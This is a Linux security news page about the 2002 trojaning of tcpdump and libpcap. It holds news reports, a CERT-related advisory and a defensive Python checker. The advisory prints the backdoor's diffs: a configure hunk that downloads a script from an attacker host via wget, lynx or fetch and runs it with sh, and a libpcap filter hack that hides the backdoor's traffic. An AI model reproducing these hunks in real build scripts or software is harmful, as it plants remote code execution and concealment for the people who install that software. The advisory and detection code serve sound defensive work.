Stay Ahead With Linux Security News
Explore Latest Linux Security news

Improving Packet Capture Methods for Gigabit Network Monitoring

Passive packet capture is necessary for many activities including network debugging and monitoring. With the advent of fast gigabit networks, packet capture is becoming a problem even on PCs due to the poor performance of popular OSs. The introduction of device polling has improved the capture process quite a bit but not really solved the problem. This paper proposes a new approach to passive packet capture that, combined with device polling, further improves it and allows, on fast machines, packets to be captured at (almost) wire speed.

1. Introduction

Many network monitoring tools are based on passive packet capture. The principle is the following: the tool passively captures packets flowing on the network and analyzes them in order to compute traffic statistics and reports including network protocols being used, communication problems, network security and bandwidth usage. Many network tools need to perform packet capture. Tcpdump, ethereal, and snort are based on a popular programming library called libpcap [libpcap] that provides a high level interface to packet capture. The main library features are:

* Ability to capture from various network media such as ethernet, serial lines, virtual interfaces.
* Same programming interface on every platform.
* Advanced packet filtering capabilities based on BPF (Berkeley Packet Filtering), implemented into the OS kernel for better performance.

Depending on the operating system, libpcap implements a virtual device from which captured packets are read by user-space applications. Although different platforms provide the very same API, libpcap performance changes significantly according to the platform being used. On low traffic conditions there is no big difference among the various platforms, whereas at high speeds the situation changes significantly. The following table shows the outcome of some tests performed using a traffic generator [tcpreplay] on a fast host (Dual 1.8 GHz Athlon, 3Com 3c59x ethernet card) that sends packets to a mid-range PC (VIA C3 533 MHz, Intel 100Mbit ethernet card) connected over a 100 Mbit Ethernet switch (Cisco Catalyst 3548 XL) that is used to count the real number of packets sent/received by the hosts. The traffic generator reproduces at full speed (~80K pkt/sec) some traffic that has been captured previously, whereas the capture application is a simple application named pcount based on libpcap that counts and discards, with no further analysis, the captured packets.

The link for this article located at net-security.org is no longer available.

Jan 09, 2004 | Anthony Pell | Network Security

Tcpdump and Libpcap Security Advisory: Spyware Attack Detected

Security experts warn system administrators that rogue hackers have implanted spyware in the latest version of a popular open-source network-monitoring tool and its code library. The main Web site for downloading a popular open-source network-monitoring tool remained off-line Thursday following a revelation that rogue hackers had implanted spyware in the latest version of the software.

Copies of tcpdump, a utility for monitoring data traffic on a network, and its library of code, called libpcap, had both been corrupted on the site, according to Michael Richardson, Webmaster for the site and a member of the open-source project that maintains the tools. "The server has been taken down until we can be sure we have found the problem," Richardson said in a phone interview Thursday.

However, other sites had already downloaded the software from the main server and hosted the files on their own computers, a practice known as mirroring. It's unknown how many of these other sites have corrupted copies of the code, said Richardson, although some have already confirmed that they have found the Trojan horse.

Tcpdump is a utility used by Unix, Linux and BSD system administrators to monitor--or "sniff"--the data that passes over the network. Libpcap is a code library that helps programmers write programs to tap into network data on many different platforms. The spyware component of the tainted software--called "conftes.c"--enables the hackers to send and execute any command on computers that contain the modified utility.

The attack bears some hallmarks of a group of hackers that struck two other open-source projects, Sendmail and OpenSSH, in October. Specifically, the Trojan horse has commands that can be triggered by using the letters a, d and m--the name of a major underground hacking group. Whether the actual hackers were members of ADM, were framing the group, or were just using the group's tools is unknown.

The hackers apparently broke into the server over the weekend from a computer in Finland and replaced the code with a corrupted version. The infected software remained available for more than two days because, Richardson said, he had been away from the main server, located in Canada, and the people who found the problem--members of the Houston Linux Users Group--didn't notify him. "It would have been nice to have a little bit more warning," Richardson said. "No one contacted me from that group."

Matt Solnik, president of the Houston Linux Users Group, said the group contacted one of the other members of the tcpdump project less than an hour after realizing the software had been compromised. Another HLUG member, Russell Adams, had been installing Snort, an open-source intrusion detection system that uses the libpcap library, when a test that matches the software package with a unique fingerprint failed. The fingerprints, known more formally as digital signatures, are used as a security measure to make sure the software can't be surreptitiously changed. "He found some interesting code and we looked over it and found that it was a Trojan," Solnik said. By Tuesday night, HLUG had extracted the Trojan horse and had started notifying tcpdump's maintainers, said Solnik.

Richardson expects to start analyzing the server Thursday night. He couldn't say when the project's server would again be available. More information is available in an advisory released by Carnegie Mellon University's Computer Emergency Response Team (CERT) Coordination Center.

The link for this article located at News.com is no longer available.

Nov 14, 2002 | LinuxSecurity.com Team | Hacks/Cracks

Tcpdump.org Incident: Trojan Found in Downloaded Utilities

The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11, and the software available for download was modified to contain Trojan Horse code. This Trojan Horse, or "back door" software, allows the hacker that wrote it to access any machine on which the modified software is run.

The two software items affected are tcpdump and libpcap, tools commonly used in information security applications. Some Intrusion Detection System (IDS) software requires libpcap.

This is the most recent in a string of similar attacks. Sendmail, one of the most widely used e-mail server software packages, was also "trojaned" recently. Others affected in recent months have included OpenSSH, the secure remote access software, and even Fragroute, a hacker utility. The identity of the hacker conducting this campaign is unknown, as is whether a connection exists between the separate incidents.

CERT released an advisory in which they "...encourage sites using libpcap and tcpdump to verify the authenticity of their distribution, regardless of where it was obtained." CERT provided the information necessary to determine the authenticity of any libpcap or tcpdump software recently downloaded. The advisory also encourages users to verify all software before installing it. "As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software."

The link for this article located at ZDNet is no longer available.

Nov 14, 2002 | LinuxSecurity.com Team | Hacks/Cracks

Tcpdump & Libpcap Trojan Alert: Significant Exploit Detected

tcpdump and libpcap were trojaned on tcpdump.org and all but one official mirror. This trojan, similar to the OpenSSH trojan from a few months ago, was caught by Gentoo's Portage system. When the configure script is run, it downloads a script from mars.rakeeti.net. This script contains an embedded shell script that creates and compiles a C source file that is not part of the tcpdump/libpcap distribution.

Latest libpcap & tcpdump sources from tcpdump.org contain a trojan.

Background: Libpcap provides a packet sniffing library for programs like Snort. Tcpdump is a standard tool for packet sniffing.

Details: The trojan contains modifications to the configure script and to gencode.c (in libpcap only). The configure script downloads a script which is then sourced with the shell. It contains an embedded shell script that creates a C file and compiles it. The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one-byte status codes:

A - program exits
D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
M - closes connection, sleeps 3600 seconds, and then reconnects

Hmm... ADM...

It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. This is similar to the OpenSSH trojan a few months ago.

Updates: Many mirrors are infected with the trojan!!!
The main mirror site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out.

Good sources:
MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz

Trojaned sources:
MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:

*** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; ***************

The (relevant) configure diff:

+ CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1> /dev/null 2> /dev/null &

The "services" payload: trojan-script (the non-obfuscated portion, excerpted); services (the complete version).

Thanks to: Russell Adams, Mathew Solnik and Scott Stout with the Houston Linux Users Group. Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums.

Last update: Wed Nov 13 03:44:08 CST 2002
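Review bot: the gencode.c hunk (`{ extern int n_errors; int len; + int l; ...`) silently rewrites the caller's filter expression before it is compiled: `buf` is replaced with `"port 1964"` whenever the user's expression mentions port 1963, and otherwise `" and not port 1963"` is appended through a freshly `malloc`ed `str` that is never freed, with `tmp` declared and never used. A filter compiler must never alter the expression it is handed, so any hard-coded port literal on this path should fail review on sight; this is exactly how traffic to the backdoor's port was hidden from every libpcap-based sniffer and IDS, and a one-line comparison of the installed gencode.c against a known-good copy is the cheapest way to spot it.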
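Review bot: the configure hunk fetches `$URL` with whichever of `wget`, `lynx` or `fetch` is installed, writes the result to `$CNF` and immediately runs `sh $CNF`, all inside a backgrounded subshell whose stdout and stderr go to /dev/null (`done) 1> /dev/null 2> /dev/null &`). A build script that downloads and executes remote content at configure time, and discards its own output so nothing appears in the build log, has no legitimate place in an autoconf script; network client names followed within a few lines by `sh` on the fetched file are a good thing to grep for in any configure whose checksum does not match the published sums above.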

Nov 13, 2002 | LinuxSecurity.com Team | Hacks/Cracks
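A defender's check that ties the "verify the authenticity of their distribution" advice in the ZDNet item and the MD5 lists in the alert above together, added here as an example and not code from the advisories or from the tcpdump project: it compares a downloaded tarball's MD5 against the good and trojaned sums the alert publishes, and scans the tarball's configure script for the download-then-`sh` shape shown in the alert's configure diff. The in-memory tarball builder and the configure texts fed to it are constructed inputs; MD5 is used only because those are the sums the advisory published.

```python
import hashlib, io, re, tarfile

# MD5 sums as published in the advisory above; the only hashes used here.
KNOWN_GOOD = {
    "libpcap-0.7.1.tar.gz": "0597c23e3496a5c108097b2a0f1bd0c7",
    "tcpdump-3.6.2.tar.gz": "6bc8da35f9eed4e675bfdf04ce312248",
    "tcpdump-3.7.1.tar.gz": "03e5eac68c65b7e6ce8da03b0b0b225e"}
KNOWN_TROJANED = {
    "libpcap-0.7.1.tar.gz": "73ba7af963aff7c9e23fa1308a793dca",
    "tcpdump-3.6.2.tar.gz": "3a1c2dd3471486f9c7df87029bf2f1e9",
    "tcpdump-3.7.1.tar.gz": "3c410d8434e63fb3931fe77328e4dd88"}
# Shape of the trojaned configure: a download tool, then "sh <file>" a few lines on.
FETCH_RE = re.compile(r"\b(wget|lynx|fetch|curl)\b")
EXEC_RE = re.compile(r"\b(sh|bash)\s+\$?\w+")

def classify_digest(name, md5hex):
    """Compare a tarball's MD5 against the advisory's good and trojaned lists."""
    if KNOWN_GOOD.get(name) == md5hex:
        return "good"
    if KNOWN_TROJANED.get(name) == md5hex:
        return "trojaned"
    return "unknown" if name in KNOWN_GOOD else "unlisted"

def suspicious_configure_lines(text, window=10):
    """Line numbers where configure fetches something and runs it shortly after."""
    lines, hits = text.splitlines(), []
    for i, line in enumerate(lines):
        if FETCH_RE.search(line) and EXEC_RE.search("\n".join(lines[i:i + window])):
            hits.append(i + 1)
    return hits

def audit_tarball(name, data):
    """Return (digest verdict, [(member, line), ...]) for an in-memory .tar.gz."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.name.rsplit("/", 1)[-1] == "configure":
                text = tar.extractfile(m).read().decode("utf-8", "replace")
                findings += [(m.name, n) for n in suspicious_configure_lines(text)]
    return classify_digest(name, hashlib.md5(data).hexdigest()), findings

def make_tarball(files):
    """Constructed demo input: a .tar.gz built in memory from {path: text}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(text.encode())
            tar.addfile(info, io.BytesIO(text.encode()))
    return buf.getvalue()
```

For a real download, read the file into `data` and call `audit_tarball(os.path.basename(path), data)`; a digest verdict of "unknown" for a listed name means the file matches neither the published good nor the published trojaned sum and needs a signature check rather than a guess.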